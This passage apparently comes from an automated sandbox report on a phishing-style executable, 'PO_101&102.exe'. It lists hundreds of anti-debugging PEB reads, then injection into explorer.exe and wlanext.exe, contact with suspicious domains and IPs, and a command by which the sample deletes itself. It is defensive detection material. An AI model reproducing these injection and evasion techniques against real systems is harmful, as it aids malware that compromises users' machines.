          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0114740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0110C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0110C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01148CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0110FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0110FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0114070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0114070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A4710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01074F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01074F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A3F33 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131751 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01148F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01088794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011317D2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0112FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01087E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01087E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01087E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01087E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01087E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01087E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0110FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01140EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01140EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01140EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01148ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0112FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03213B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03213B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03214BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03214BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03214BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0329D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0321B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03212397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03224A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03224A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\PO_101&102.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.barbershopvalleyvillage.com
          Source: C:\Windows\explorer.exeDomain query: www.champ-beauty-tomigaoka-nail.com
          Source: C:\Windows\explorer.exeNetwork Connect: 150.95.255.38 80
          Source: C:\Windows\explorer.exeDomain query: www.reprv.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.44.94.227 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO_101&102.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 920000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO_101&102.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO_101&102.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO_101&102.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\PO_101&102.exeMemory written: C:\Users\user\Desktop\PO_101&102.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO_101&102.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO_101&102.exeThread register set: target process: 3352
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3352
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess created: C:\Users\user\Desktop\PO_101&102.exe {path}
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_101&102.exe'
          Source: explorer.exe, 0000000A.00000000.366275043.00000000011E0000.00000002.00020000.sdmp, wlanext.exe, 0000000D.00000002.543841774.0000000004820000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000A.00000000.313234158.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 0000000A.00000000.366275043.00000000011E0000.00000002.00020000.sdmp, wlanext.exe, 0000000D.00000002.543841774.0000000004820000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.366275043.00000000011E0000.00000002.00020000.sdmp, wlanext.exe, 0000000D.00000002.543841774.0000000004820000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.366275043.00000000011E0000.00000002.00020000.sdmp, wlanext.exe, 0000000D.00000002.543841774.0000000004820000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000A.00000000.305586847.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Users\user\Desktop\PO_101&102.exe VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
